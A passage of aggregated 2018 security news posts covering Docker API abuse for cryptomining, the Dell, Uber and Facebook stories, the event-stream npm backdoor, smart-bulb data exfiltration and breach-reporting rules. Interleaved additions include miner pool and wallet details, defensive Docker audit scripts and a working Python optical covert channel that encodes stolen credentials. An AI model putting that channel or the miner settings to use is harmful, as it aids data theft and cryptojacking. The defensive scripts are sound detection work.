  • timonmat/xmr-stak-cpu
  • strm/xmrig
  • bitnn/alpine-xmrig

kannix/monero-miner ran with the following arguments in all analyzed samples:

  • Algorithm – cryptonight-lite
  • Pool used – pool.aeon.hashvault.pro:3333
  • User (wallet account) – WmthxKa4FVvSDA8fjyXiZJB3WWWFxumQJAZfRGmrMCaMCooq52sipimAYJM2NYNy34bJUX566wEBmEC2QmdmnVLh2GzgRy4F6
  • Password – phantompain
  • Donate-level – 1
  • Max-cpu-usage – 100
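The image names and the xmrig-style arguments listed above are exactly what a defender can match on. The following POSIX shell function is an added example, not code from the article: it reads the output of `docker ps --no-trunc --format '{{.ID}}\t{{.Image}}\t{{.Command}}'` and flags containers that either run one of the miner images named in this article or whose command line carries mining arguments (the pool, algorithm and --donate-level/--max-cpu-usage switches above, plus the common stratum+tcp:// pool scheme), so a miner hidden in a retagged base image is still caught. The function names and the sample lines are my own; the sample is constructed, with the wallet replaced by a placeholder and a pool hostname in the reserved .invalid domain.

```shell
#!/bin/sh
# Added example: flag cryptominer containers from `docker ps` output.
# Not from the article; the sample data below is constructed.

TAB=$(printf '\t')

# Input lines:  <id>TAB<image>TAB<command>, as produced by
#   docker ps --no-trunc --format '{{.ID}}\t{{.Image}}\t{{.Command}}'
# Output lines: <id>TAB<image>TAB<reason> for each suspicious container.
flag_miner_containers() {
    while IFS="$TAB" read -r id image cmd; do
        reason=""
        # Images the article found running on compromised hosts.
        case "$image" in
            kannix/monero-miner*|arayan/monero-miner*|timonmat/xmr-stak-cpu*|strm/xmrig*|bitnn/alpine-xmrig*)
                reason="known-miner-image" ;;
        esac
        # A miner smuggled into a plain base image still needs a pool, an
        # algorithm and the usual xmrig/xmr-stak switches on its command line.
        if [ -z "$reason" ]; then
            case "$cmd" in
                *cryptonight*|*hashvault.pro*|*donate-level*|*max-cpu-usage*|*xmrig*|*xmr-stak*|*stratum+tcp://*)
                    reason="miner-arguments" ;;
            esac
        fi
        if [ -n "$reason" ]; then
            printf '%s\t%s\t%s\n' "$id" "$image" "$reason"
        fi
    done
}

# Constructed sample, not captured from a real host. Line 1 mirrors the
# argument set reported in the article (wallet replaced by a placeholder);
# line 3 is a miner hidden in a stock Debian image with a made-up pool.
sample_containers() {
    printf '%s\t%s\t%s\n' \
        1a2b3c 'kannix/monero-miner' '"./xmrig -a cryptonight-lite -o pool.aeon.hashvault.pro:3333 -u WALLET_PLACEHOLDER -p phantompain --donate-level 1 --max-cpu-usage 100"' \
        4d5e6f 'nginx:1.15'          '"nginx -g daemon off;"' \
        7a8b9c 'debian:stretch'      '"/tmp/.x/xmrig -o stratum+tcp://pool.example.invalid:3333"' \
        0d1e2f 'strm/xmrig'          '"/xmrig"' \
        3f4a5b 'postgres:11'         '"docker-entrypoint.sh postgres"'
}

# Against a live host the pipeline is:
#   docker ps --no-trunc --format '{{.ID}}\t{{.Image}}\t{{.Command}}' | flag_miner_containers
sample_containers | flag_miner_containers
```

Run on the constructed sample it reports three containers: the two known images and the debian:stretch container whose command line gives it away. The image list is only as good as the day it was written, which is why the argument check runs as a second pass rather than being skipped when the image looks innocent.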

How to prevent such attacks?

To prevent such attacks, the Docker API must be secured: TLS needs to be enabled by specifying the tlsverify flag and pointing Docker’s tlscacert to a trusted CA certificate, so that only clients presenting a certificate signed by that CA can talk to the daemon.

A step-by-step procedure for securing the API is described in the Docker security documentation; please refer to “Protect the Docker daemon socket”.
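As an added example (not part of the original article), the following POSIX shell script turns the verification step from the set-up section (`ps -ef | grep docker`) and the mitigation above into a check: it classifies a dockerd command line as local-only, plaintext TCP, TLS without client verification, or TLS with --tlsverify, and shows the article’s weak ExecStart beside a hardened one of the shape the “Protect the Docker daemon socket” documentation describes. The function names, the certificate paths under /etc/docker and the fd:// line used as a stock default are assumptions of mine; the --tlsverify, --tlscacert, --tlscert, --tlskey, -H and --tls flags are real dockerd options.

```shell
#!/bin/sh
# Added example: classify how a dockerd process listens, from its command
# line (the same text `ps -ef | grep docker` shows). Not from the article.

# Does a -H/--host value denote a TCP listener? dockerd treats a bare
# host:port (as in the official docs' -H=0.0.0.0:2376) as tcp.
is_tcp_host() {
    case "$1" in
        tcp://*)                   return 0 ;;
        unix://*|fd://*|npipe://*) return 1 ;;
        *://*)                     return 1 ;;
        *)                         return 0 ;;
    esac
}

# Prints LOCAL-ONLY, TCP-PLAINTEXT, TCP-TLS-UNVERIFIED or TCP-TLS-VERIFIED.
# Caveat: dockerd also reads /etc/docker/daemon.json ("hosts", "tls",
# "tlsverify"); settings made there are invisible to this command-line check.
dockerd_exposure() {
    has_tcp=0; has_tls=0; has_tlsverify=0
    set -f                      # no glob expansion while splitting the line
    set -- $1
    set +f
    while [ $# -gt 0 ]; do
        case "$1" in
            -H|--host)
                shift
                if [ $# -gt 0 ] && is_tcp_host "$1"; then has_tcp=1; fi ;;
            -H=*|--host=*)
                if is_tcp_host "${1#*=}"; then has_tcp=1; fi ;;
            --tls|--tls=true)             has_tls=1 ;;
            --tlsverify|--tlsverify=true) has_tlsverify=1 ;;
        esac
        if [ $# -gt 0 ]; then shift; fi
    done
    if [ "$has_tcp" -eq 0 ]; then echo LOCAL-ONLY
    elif [ "$has_tlsverify" -eq 1 ]; then echo TCP-TLS-VERIFIED
    elif [ "$has_tls" -eq 1 ]; then echo TCP-TLS-UNVERIFIED
    else echo TCP-PLAINTEXT
    fi
}

# Constructed sample command lines (not captured from a real host).
# The first is the drop-in from the article; the second is the shape the
# Docker documentation recommends (certificate paths are assumptions).
WEAK_EXECSTART='/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock'
HARDENED_EXECSTART='/usr/bin/dockerd --tlsverify --tlscacert=/etc/docker/ca.pem --tlscert=/etc/docker/server-cert.pem --tlskey=/etc/docker/server-key.pem -H=0.0.0.0:2376 -H unix:///var/run/docker.sock'

# Audit the daemon actually running on this host (Linux procps `ps`).
audit_running_dockerd() {
    ps -eo args= | grep -E '^(/[^ ]*/)?dockerd( |$)' | while read -r line; do
        printf '%s: %s\n' "$(dockerd_exposure "$line")" "$line"
    done
}

printf '%s: %s\n' "$(dockerd_exposure "$WEAK_EXECSTART")" "$WEAK_EXECSTART"
printf '%s: %s\n' "$(dockerd_exposure "$HARDENED_EXECSTART")" "$HARDENED_EXECSTART"
```

TCP-TLS-UNVERIFIED (the --tls flag without --tlsverify) is worth distinguishing: it encrypts the connection but still lets any client on the network drive the daemon, so from the point of view of this article it is no better than plaintext.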

About the author: Kirtar Oza CISSP, CISA, MS

Edited by Pierluigi Paganini

(Security Affairs – cybersecurity, Hacking)

The post Knock-Knock Docker!! Will you let me in? Open API Abuse in Docker Containers appeared first on Security Affairs.

Dell resets all customer passwords after security breach

By Waqas

The computer technology giant Dell has announced on Wednesday that it has suffered a potential security breach in which hackers attempted to steal customer data from its website Dell.com. The incident took place on November 9th when Dell detected and disrupted an attack aimed at the personal data of its customers including names, email addresses, and […]

This is a post from HackRead.com Read the original post: Dell resets all customer passwords after security breach

Dell data breach – Dell forces password reset after the incident

Dell data breach – IT giant Dell disclosed a data breach: the company confirmed it detected an intrusion into its systems on November 9th, 2018.

Attackers were trying to exfiltrate customer data (i.e. names, email addresses, and hashed passwords) from the company portal Dell.com and from the support.dell.com website.

Wednesday that its online electronics marketplace experienced a “cybersecurity incident” earlier this month when an unknown group of hackers infiltrated its internal network.

As a precautionary measure, Dell forced a password reset for all accounts on the Dell.com website; the company also announced additional measures to mitigate the potential effects of the incident.

At this time it is still unclear whether the hackers succeeded in stealing customer information; the investigation is still ongoing and Dell hasn’t shared any technical details on the intrusion. Dell hired a digital forensics firm to conduct an investigation and reported the incident to law enforcement.

“On November 9, 2018, Dell detected and disrupted unauthorized activity on our network that attempted to extract Dell.com customer information, limited to names, email addresses and hashed passwords,” read the data breach notification published by Dell.

“Upon detection, we immediately implemented countermeasures and began an investigation. We also retained a digital forensics firm to conduct an independent investigation and engaged law enforcement.”

The tech firm confirmed that payment information and Social Security numbers were not exposed by the security breach.

“Credit card and other sensitive customer information was not targeted. The incident did not impact any Dell products or services.” continues Dell.

“Upon detection of the attempted extraction, Dell immediately implemented countermeasures and initiated an investigation.”

Customers who have a Dell account or who have contacted online support can find more information on a dedicated web page Dell established at www.dell.com/customerupdate.

Customers should change the passwords of any other accounts on other services if they used the same password as for their Dell.com account.

Pierluigi Paganini

(Security Affairs – Dell data breach, hacking)

The post Dell data breach – Dell forces password reset after the incident appeared first on Security Affairs.

FBI & Google shut down largest-ever Ad fraud scheme ‘3VE’

By Waqas

8 suspects behind 3VE have also been identified. Last year in August, the Federal Bureau of Investigation organized a secret meet-up between cybersecurity and digital advertising experts in its Manhattan federal building. This included Google and nearly 20 tech firms while there were nearly 30 attendees at the meeting. The agenda of the meeting was to […]

This is a post from HackRead.com Read the original post: FBI & Google shut down largest-ever Ad fraud scheme ‘3VE’

British MP: Facebook was aware about Russian activity at least since 2014

A British MP claims Facebook was aware of Russian political interference in 2014, long before the events became public.

The British MP Damian Collins, head of a parliamentary inquiry into disinformation, revealed that one of the emails seized from US software company Six4Three as part of a US lawsuit, demonstrates that a Facebook engineer had notified the social network giant in October 2014 that Russian IP addresses were accessing “three billion data points a day” on the network.

“British MPs joined together with fellow lawmakers from the parliaments of Argentina, Brazil, Canada, France, Ireland, Latvia and Singapore in an unusual move aimed at emphasising international solidarity on the issue,” reported AFP.

The information was shared during an international hearing that parliament hosted on Tuesday to gather information on disinformation and “fake news.”

The emails confirmed that Facebook was aware of the activities carried out by Russian threat actors in 2014 when they accessed a huge amount of data from the social media company.

“If Russian IP addresses were pulling down a huge amount of data from the platform was that reported or was that just kept, as so often seems to be the case, within the family and not talked about,” Collins asked Richard Allan, Facebook’s Vice President of Policy Solutions.

Richard Allan, Facebook’s Vice President of Policy Solutions, who represented the company, replied that the information could be used to provide a distorted interpretation of events.

“Any information you have seen… is at best partial and at worst potentially misleading” replied Allan. The emails were “unverified partial accounts”.

Allan also defended Facebook CEO Mark Zuckerberg, who has refused to appear before the British parliamentary inquiry.

Since the disclosure of the Cambridge Analytica privacy scandal and the alleged interference in the 2016 Presidential election, Facebook’s data protection policies have been questioned by intelligence analysts and privacy advocates.

“While we were playing with our phones and apps, our democratic institutions… seem to have been upended by fratboy billionaires in California,” Charlie Angus from Canada’s House of Commons told Allan.

Catherine Morin-Desailly from the French Senate classified Facebook’s data protection approach as “a scandal”; other lawmakers condemned the way Facebook shared user data with third-party companies.

Pierluigi Paganini

(Security Affairs – Facebook, fake news)

The post British MP: Facebook was aware about Russian activity at least since 2014 appeared first on Security Affairs.

Uber fined nearly $1.2 Million by Dutch and UK Data Protection Authorities over data breach

British and Dutch data protection regulators fined the ride-sharing company Uber $1,170,892 for the 2016 data breach.

British and Dutch data protection regulators have fined Uber $1,170,892 for the 2016 security breach that exposed the personal data of 57 million of its users.

In November 2017, Uber CEO Dara Khosrowshahi announced that hackers had broken into the company database and accessed the personal data (names, email addresses and cellphone numbers) of 57 million of its users; the disconcerting revelation was that the company had covered up the hack for more than a year.

The attackers also accessed the names and driver’s license numbers of roughly 600,000 of its drivers in the United States.

The hack happened in 2016, and it was easy for the hackers, who, according to a report published by Bloomberg, obtained credentials from a private GitHub site used by the company’s development team. The hackers tried to blackmail Uber and demanded $100,000 from the company in exchange for not publishing the stolen data.

Rather than notifying customers and law enforcement of the data breach, as required by California’s data security breach notification law, chief of information security Joe Sullivan ordered the ransom to be paid and the story covered up, destroying any evidence. The payout was disguised as a bug bounty prize, complete with signed non-disclosure agreements.

Now Britain’s Information Commissioner’s Office (ICO) has fined Uber 385,000 pounds ($491,102) for failing to protect the personal information of 3 million Britons.

“The Information Commissioner’s Office (ICO) has fined ride sharing company Uber £385,000 for failing to protect customers’ personal information during a cyber attack.

A series of avoidable data security flaws allowed the personal details of around 2.7million UK customers to be accessed and downloaded by attackers from a cloud-based storage system operated by Uber’s US parent company. This included full names, email addresses and phone numbers.” states the ICO.

“The records of almost 82,000 drivers based in the UK – which included details of journeys made and how much they were paid – were also taken during the incident in October and November 2016.”

ICO Director of Investigations Steve Eckersley declared:

“This was not only a serious failure of data security on Uber’s part, but a complete disregard for the customers and drivers whose personal information was stolen. At the time, no steps were taken to inform anyone affected by the breach, or to offer help and support. That left them vulnerable.”

“Paying the attackers and then keeping quiet about it afterwards was not, in our view, an appropriate response to the cyber attack.”

“Although there was no legal duty to report data breaches under the old legislation, Uber’s poor data protection practices and subsequent decisions and conduct were likely to have compounded the distress of those affected.”

The UK ICO confirmed that none of the affected customers were notified of the security breach.

The Dutch Data Protection Authority (Dutch DPA) fined the company 600,000 euro ($679,790)  for failing to protect the personal information of 174,000 Dutch citizens.

“The Dutch Data Protection Authority (Dutch DPA) imposes a fine of €600.000 upon Uber B.V. and Uber Technologies, Inc (UTI) for violating the Dutch data breach regulation. ” states the Dutch DPA.

“This data breach has affected 57 million Uber users worldwide, and concerns 174.000 Dutch citizens. Amongst the data were names, e-mail addresses and telephone numbers of customers and drivers.”

In an official statement, Uber announced that it is “pleased to close this chapter on the data incident from 2016.”

The company highlighted that it has introduced a number of technical improvements since the data breach.

“We learn from our mistakes,” the company said.

Pierluigi Paganini

(Security Affairs – data protection, UK Parliament)

The post Uber fined nearly $1.2 Million by Dutch and UK Data Protection Authorities over data breach appeared first on Security Affairs.

Professionally Evil Insights: Spring Break without Breaking the Bank: Hands On Training

Over the last eight years, one of the main focuses of Secure Ideas has been education.  One responsibility we take very seriously is that of growing the skills within our clients and the public, with the objective of raising the bar in security.  This mindset and core passion of Secure Ideas is because we all believe that we stand on the shoulders of giants. As each of us has grown into the roles we currently hold, we were not only shaped and developed by our own experiences, but also by the knowledge shared by others.  This desire to learn and grow is one of the main things that make me proud to be a part of the security community.

However, there are a couple of significant problems with our industry:  First, information security needs are growing faster than skilled personnel are learning.  Second, the cost of training has increased outrageously over the past decade.

The first issue has been discussed for almost as long as I have been involved in information security.  Even Alan Paller of the SANS Institute has been speaking about the skills gap for over a decade!  The second issue is even worse as it makes it harder to fix the first.  Training costs for a single class often exceed $5000 without even factoring in travel and the time away from work. So how do we fix this?

At Secure Ideas, we have decided that it is our responsibility as active practitioners to help fix this lack of affordable training and help address the skills gap.  To that end, we are committed to the following for 2019:

  1. First, we want to announce our Professionally Evil Spring Break event.  This 3-day event will host two classes; Professionally Evil Network Security and Professionally Evil Application Security.  The first will focus on network penetration testing and the second focuses on application security and assessments. Either class is only $750, discounted to an early bird price of $600 until January 18, 2019.  Moreover veterans, active duty military and first responders get either for 50% off.
  2. Second, our Secure Ideas Training site has recorded classes starting at $25 each and vets get them for free!  And our webcasts will continue to be run as often as we can.
  3. Third, we will continue to support and release our open-source training products such as SamuraiWTF and the Professionally Evil Web Penetration Testing 101 course.

We hope that together we can all help increase the skills of our industry and provide affordable training for all.  Let us know if you have any questions or if you would like us to run a private training for your organization.



Professionally Evil Insights

Malicious developer distributed tainted version of Event-Stream NodeJS Module to steal Bitcoins

A hacker compromised the third-party NodeJS module “Event-Stream”, introducing malicious code aimed at stealing funds from Bitcoin wallet apps.

The malicious code was introduced in version 3.3.6, published on September 9 via the Node Package Manager (NPM) repository.

The Event-Stream library is a very popular NodeJS module that lets developers manage data streams; it has nearly 2 million downloads a week.

It has been estimated that the tainted version of the library was downloaded by nearly 8 million developers.

The library was created by Dominic Tarr, who maintained it for a long time, but when he left the project he allowed an unknown programmer, called “right9ctrl”, to continue his work.

“he emailed me and said he wanted to maintain the module, so I gave it to him. I don’t get anything from maintaining this module, and I don’t even use it anymore, and haven’t for years.” wrote Tarr.

Tarr trusted right9ctrl because of his important contributions to the project, but once right9ctrl had gained access to the library he released Event-Stream version 3.3.6, which added a new library, called Flatmap-Stream, as a dependency; this dependency was specifically designed to implement the malicious feature.

The bad news is that the code remained undetected for more than 2 months because it was encrypted. The malicious code was spotted by a computer science student at California State University, Ayrton Sparling (FallingSnow handle on GitHub), who reported it.

“If you are using anything crypto-currency related, then maybe. As discovered by @maths22, the target seems to have been identified as copay related libraries. It only executes successfully when a matching package is in use (assumed to be copay at this point).” reported Sparling  on GitHub

“If you are using a crypto-currency related library and if you see flatmap-stream@0.1.1 after running npm ls event-stream flatmap-stream, you are most likely affected.

For example:

$ npm ls event-stream flatmap-stream

flatmap-stream@0.1.1”

The NPM repository maintainer who analyzed the malicious code discovered that it was designed to target users of the open-source Bitcoin wallet app BitPay, a distribution of the Copay project, which relies on event-stream.

A security advisory published by BitPay confirms that Copay versions 5.0.2 through 5.1.0 were affected by the malicious code; the organization released Copay version 5.2.0 to address the issue.

“We have learned from a Copay GitHub issue report that a third-party NodeJS package used by the Copay and BitPay apps had been modified to load malicious code which could be used to capture users’ private keys. Currently we have only confirmed that the malicious code was deployed on versions 5.0.2 through 5.1.0 of our Copay and BitPay apps. However, the BitPay app was not vulnerable to the malicious code. We are still investigating whether this code vulnerability was ever exploited against Copay users.” BitPay says in the advisory.

“Users should assume that private keys on affected wallets may have been compromised, so they should move funds to new wallets (v5.2.0) immediately. Users should not attempt to move funds to new wallets by importing affected wallets’ twelve word backup phrases (which correspond to potentially compromised private keys). Users should first update their affected wallets (5.0.2-5.1.0) and then send all funds from affected wallets to a brand new wallet on version 5.2.0, using the Send Max feature to initiate transactions of all funds.”

The malicious code allowed the attackers to steal digital coins stored in Dash Copay Bitcoin wallets and transfer them to a server located in Kuala Lumpur, Malaysia.

On Monday, NPM maintainers removed the backdoor from the repository.

Pierluigi Paganini

(Security Affairs – Daniel’s Hosting, dark web)

The post Malicious developer distributed tainted version of Event-Stream NodeJS Module to steal Bitcoins appeared first on Security Affairs.

Experts demonstrate how to exfiltrate data using smart bulbs

Security researchers with Checkmarx developed two mobile applications that abuse the functionality of smart bulbs for data exfiltration.

Security researchers with Checkmarx developed two mobile applications that exploit smart bulbs features for data exfiltration.

The experts used the Magic Blue smart bulbs that implement communication through Bluetooth 4.0. The devices are manufactured by the Chinese company called Zengge and could be controlled using both Android and iOS apps.

The company supplies major brands like Philips and Osram etc.

The experts focused their study on devices using the Low Energy Attribute Protocol (ATT) to communicate.

The first test made by the experts consisted of sniffing the communication between the smart bulbs and the paired mobile application. The pairing method used by the researchers is Just Works.

The experts paired the Android mobile phone with the iLight app and started sniffing the traffic while changing the colors of the smart bulbs.

In this way, the researchers discovered the commands sent by the mobile app to the smart bulbs. The team reverse engineered the mobile application using the jadx tool.

Once they had gained complete control of the bulbs, the experts started working on an application that leverages the light of the bulbs to transfer information from a compromised device to the attacker.

“The main plan for exfiltration was to use light as a channel to transfer information from a compromised device to the attacker. Light can achieve longer distances, which was our goal.” reads the analysis published by the experts.

“Imagine the following attack scenario: a BLE device (smartphone) gets compromised with malware. The malware steals the user’s credentials. The stolen information is sent to an attacker using a BLE light bulb nearby.”

Checkmarx experts used a smartphone connected to a telescope to receive the exfiltrated data without raising suspicion.

The researchers created two applications for the data exfiltration: one installed on the victim’s mobile device and the other on the attacker’s mobile device to receive and interpret the data.

The application installed on the victim’s device modulates the light intensity to transfer data; it runs in either Normal or Stealth mode. The Stealth mode is hard for the victim’s eye to detect because it uses shades of blue.

“We created two apps, the first app for sending the exfiltrated data and a second one for receiving it. The app that transmits the information changes the blue light intensity – weaker for binary 1 and stronger for binary 0. The app has two options: Normal mode and Stealth mode. The first one may be visible to human-eye and the stealth mode is very hard to detect because of the variations of shades of blue used.” continues the experts.
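The modulation described above, as an added example that is not part of the Checkmarx research or the original post: bits are framed and mapped onto two blue intensities (stronger blue for 0, weaker blue for 1, as the researchers describe), pushed to a bulb, and recovered on the receiving side by thresholding brightness samples. The page does not document the BLE write that sets the Magic Blue colour, so the bulb is modelled as any callable that accepts an RGB tuple; the sync byte, length byte, intensity levels and the noisy camera model are constructed assumptions that let the channel be tested offline.

```python
"""Optical covert channel over a smart bulb: bits as blue-intensity steps.

Added example, not code from the Checkmarx research or the original post.
The page does not document the BLE write that sets the Magic Blue colour, so
the "bulb" here is any callable that accepts an RGB tuple; the sync byte,
length byte, intensity levels and camera model below are constructed
assumptions used to make the channel testable offline.
"""
import random
from typing import Callable, List, Tuple

RGB = Tuple[int, int, int]

# Constructed framing: a sync byte with both 0 and 1 bits lets the receiver
# find the frame start and calibrate its threshold; a length byte bounds the
# payload so trailing samples are ignored.
SYNC = 0b01111110
MAX_PAYLOAD = 255

# (strong, weak) blue levels per mode, following the page's mapping:
# stronger blue = binary 0, weaker blue = binary 1. Values are illustrative.
LEVELS = {"normal": (255, 120), "stealth": (255, 225)}


def bytes_to_bits(data: bytes) -> List[int]:
    """MSB-first bit list."""
    return [(byte >> shift) & 1 for byte in data for shift in range(7, -1, -1)]


def bits_to_bytes(bits: List[int]) -> bytes:
    """Pack whole bytes only; a trailing partial byte is dropped."""
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        value = 0
        for bit in bits[i:i + 8]:
            value = (value << 1) | bit
        out.append(value)
    return bytes(out)


def encode(payload: bytes, mode: str = "stealth") -> List[RGB]:
    """Frame the payload and map every bit to one colour symbol."""
    if len(payload) > MAX_PAYLOAD:
        raise ValueError("payload too long for one frame")
    strong, weak = LEVELS[mode]
    frame = bytes([SYNC, len(payload)]) + payload
    return [(0, 0, weak if bit else strong) for bit in bytes_to_bits(frame)]


def transmit(symbols: List[RGB], set_colour: Callable[[RGB], None]) -> int:
    """Drive the bulb one symbol at a time; returns the number of symbols sent."""
    for colour in symbols:
        set_colour(colour)
    return len(symbols)


def simulate_camera(symbols: List[RGB], gain: float = 0.8,
                    noise: float = 2.0, seed: int = 1) -> List[float]:
    """Constructed stand-in for the attacker's phone camera: attenuated blue
    plus Gaussian noise, one sample per symbol (a real receiver must also
    recover symbol timing from the video)."""
    rng = random.Random(seed)
    return [colour[2] * gain + rng.gauss(0.0, noise) for colour in symbols]


def decode(samples: List[float]) -> bytes:
    """Recover the payload from brightness samples without knowing the
    absolute levels: the threshold is taken from the observed extremes."""
    if len(samples) < 16:
        raise ValueError("not enough samples for a frame header")
    threshold = (max(samples) + min(samples)) / 2.0
    bits = [1 if s < threshold else 0 for s in samples]  # weak blue -> 1
    sync_bits = bytes_to_bits(bytes([SYNC]))
    for start in range(len(bits) - 15):
        if bits[start:start + 8] != sync_bits:
            continue
        length = bits_to_bytes(bits[start + 8:start + 16])[0]
        body = bits[start + 16:start + 16 + 8 * length]
        if len(body) == 8 * length:
            return bits_to_bytes(body)
    raise ValueError("no complete frame found")


if __name__ == "__main__":
    written: List[RGB] = []                      # stand-in bulb records the writes
    transmit(encode(b"alice:hunter2"), written.append)
    print(decode(simulate_camera(written)))     # b'alice:hunter2'
```

The receiver calibrates its threshold from the sync byte rather than from fixed levels, which is what makes the stealth variant workable: the two shades only need to be distinguishable to the camera, not to a human, and the same decoder handles both modes.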

The experts also published a video PoC of the attack.

“These methods will work on every smart bulb that allows control by an attacker. In the future, we would like to create a better proof of concept that allows us to test a database of vulnerable bulbs and even implement AI to learn and implement new bulbs along the way,” Checkmarx concludes.

Pierluigi Paganini

(Security Affairs – data exfiltration, smart bulbs)

The post Experts demonstrate how to exfiltrate data using smart bulbs appeared first on Security Affairs.

Security Affairs: UK Parliament seized confidential Facebook docs to investigate its data protection policies.

The UK Parliament seized confidential Facebook documents from the developer of a now-defunct bikini photo search app in order to investigate the company's data protection policies.

A British lawmaker compelled a visiting tech executive to hand over the files ahead of an international hearing that Parliament is hosting on Tuesday to gather evidence on disinformation and “fake news.”

Damian Collins, chairman of Parliament's Digital, Culture, Media and Sport Committee, obtained and reviewed the documents, which the committee received from the app maker Six4Three and which relate to Facebook.

“Under UK law & parliamentary privilege we can publish papers if we choose to as part of our inquiry.”

Six4Three acquired the files, related to a period between 2013 and 2014, as part of a U.S. lawsuit against Facebook.

The dispute centers on the changes Facebook made to its privacy policies in 2015 that led Six4Three to shut down its app, Pikinis. Pikinis allowed users to find photos of their friends in bikinis and bathing suits by searching their friends list.

Collins aims to show how abuse of Facebook's platform could feed misinformation campaigns and interference in political elections.

Lawmakers from seven countries are preparing to question Facebook executive Richard Allan at the committee's hearing in London next Tuesday. Facebook CEO Mark Zuckerberg has refused to attend.

“The U.K. committee used its powers to compel the chief executive of Six4Three, Theodore Kramer, who was on a business trip to London, to turn over the files, according to parliamentary records and news reports.” reported the AP agency.

“The committee twice requested that Kramer turn over the documents. When he failed to do so, Kramer was escorted to parliament and told he risked imprisonment if he didn’t hand them over, the Observer newspaper reported.”

Facebook opposes the disclosure of the files; a judge in California ordered them sealed earlier this year.

Allan informed Collins via email that the judge is expected to give guidance on the legal status of the documents as early as Monday.

“Six4Three’s claims are entirely meritless,” Facebook said in a statement.

Last week, Facebook announced it would appeal the fine imposed for failing to protect users' privacy in the Cambridge Analytica scandal. The political consultancy Cambridge Analytica improperly collected and misused the data of 87 million Facebook users.

Facebook has been fined £500,000 in the U.K., the maximum fine allowed by the UK’s Data Protection Act 1998, for failing to protect users’ personal information.


The social network giant maintains that U.K. regulators failed to prove that British users were directly affected.

Britain's Information Commissioner's Office (ICO) also found that the company failed to be transparent about how people's data was harvested by others.

According to the ICO, even after the misuse of the data was discovered in December 2015, the company did not do enough to ensure that those who continued to hold it had taken adequate and timely remedial action, including deletion. Other companies continued to access Facebook users' data, among them the SCL Group, which was able to access the platform until 2018.

Facebook considers the fine unacceptable, arguing that many online practices that threaten users' privacy are commonly accepted.

Pierluigi Paganini

(Security Affairs – data protection, UK Parliament)

The post UK Parliament seized confidential Facebook docs to investigate its data protection policies. appeared first on Security Affairs.



Security Affairs: Ransomware attack disrupted emergency rooms at Ohio Hospital System

Ransomware attacks continue to threaten the healthcare industry; the most recent incident impacted the Ohio Hospital System.

The ransomware infected computer systems at East Ohio Regional Hospital and Ohio Valley Medical Center and reportedly disrupted the hospitals' emergency rooms.

The malware hit the Ohio Hospital System on the evening of Friday, Nov. 23. According to The Times Ledger newspaper, the hospitals were unable to accept ER patients brought in by emergency responders.

“Emergency squad patients are being diverted away from East Ohio Regional Hospital and Ohio Valley Medical Center this weekend because the hospitals’ computer system has been attacked by Ransomware.” reads The Times Ledger newspaper.

“Area emergency squads began transporting patients to other area hospitals after receiving notification of the full diversion.”

The patients were diverted to other area hospital emergency rooms.


Karin Janiszewski, director of marketing and public relations for the hospitals, explained that the two hospitals were able to handle walk-in ER patients.

“At the moment, our emergency rooms are unable to take patients by E-squads, but we can take patients by walk-in,” Janiszewski said. “Our IT team is working around the clock right now and we expect to have the issue resolved by (Sunday).”

The IT staff planned to fully restore normal operations by Sunday, November 25. According to the hospitals, no data was exposed in the attack.

“We have redundant security, so the attack was able to get through the first layer but not the second layer,” she added. “There has been no patient information breach.”

Pierluigi Paganini

(Security Affairs – ransomware, Ohio Hospital System)

The post Ransomware attack disrupted emergency rooms at Ohio Hospital System appeared first on Security Affairs.



When Do You Need to Report a Data Breach?

The way in which you respond to a data breach has a significant impact on how severe its consequences are. Reporting an event is one action that can help.

The number of data breaches tracked in the U.S. in 2017 totaled 1,579, a 44.7 percent increase over the previous year. Data breaches, incidents in which personal information is accidentally or unlawfully stolen, lost, disclosed, accessed, altered or destroyed, can happen to organizations of any size and sector.

Most data breach laws deal with personal data, which is essentially any information that can be associated with a particular person. Other rules concern personally identifiable information, which is data that someone could use, alone or along with additional information, to trace or distinguish a person’s identity.

When Should You Report a Data Breach?

In general, you should report a personal data breach if it is likely to result in a risk to the rights and freedoms of the people concerned. This is the standard set by the General Data Protection Regulation (GDPR), which applies to organizations that process the personal data of people in the European Union, wherever the organization is established. An incident might threaten someone's rights and freedoms if it may result in identity theft, identity fraud, financial loss, discrimination, damage to reputation, social disadvantage or loss of confidentiality.

International, federal and state laws vary in their requirements about when to report breaches. In the U.S., all 50 states, the District of Columbia, Puerto Rico, Guam and the Virgin Islands have laws that require entities to notify people of breaches involving personally identifiable information.

How Soon After a Breach Should You Report It?

Under the GDPR, a data controller must notify the competent supervisory authority within 72 hours of becoming aware of a personal data breach, unless the breach is unlikely to result in a risk to individuals. The notification describes the nature of the breach, the categories and approximate number of data subjects and records concerned, the likely consequences and the measures taken or proposed; information that is not yet available may be supplied in phases. If the notification is made after 72 hours, it must be accompanied by the reasons for the delay. Affected individuals must be informed without undue delay when the breach is likely to result in a high risk to their rights and freedoms.

Under the Health Insurance Portability and Accountability Act (HIPAA), covered entities must notify affected individuals without unreasonable delay and no later than 60 days after discovering a breach of unsecured protected health information, regardless of its size. When 500 or more people are affected, the U.S. Department of Health and Human Services and prominent media outlets must also be notified within the same 60-day window; smaller breaches are logged and reported to HHS annually. Regulators for some other sectors, such as the Securities and Exchange Commission (SEC), do not set a specific timeframe.

Requirements under state laws vary. In New Mexico, businesses must notify affected residents within 45 days of discovering a breach and, if more than 1,000 residents are affected, must also notify the state attorney general and the major consumer reporting agencies within the same period. California requires notification of affected residents in the most expedient time possible and without unreasonable delay, with no fixed deadline, and a copy of the notice must go to the state attorney general when more than 500 residents are affected.

Laws, of course, affect how soon companies must report cybersecurity incidents. They should also do their best to ensure they have as much accurate information as possible before sending out an alert to avoid miscommunications. If an organization waits too long, on the other hand, the damage may already be done. It’s important to strike a balance between these two extremes.

To Whom Should You Report a Breach?

Who you should notify depends on the laws that apply to you, the industry you're in and who was affected. In many cases you must notify a supervisory authority: under the GDPR that is the competent supervisory authority for your organization (in the UK, the Information Commissioner's Office). If your organization is covered by the FTC's Health Breach Notification Rule, you must notify the U.S. Federal Trade Commission (FTC) and, for larger breaches, the media. If you are covered by the HIPAA Breach Notification Rule, you must inform the U.S. Department of Health and Human Services.

It is advisable to tell law enforcement about a breach as quickly as possible. You may call local police, but if they are not familiar with cybersecurity incidents, you can also call your local FBI office.

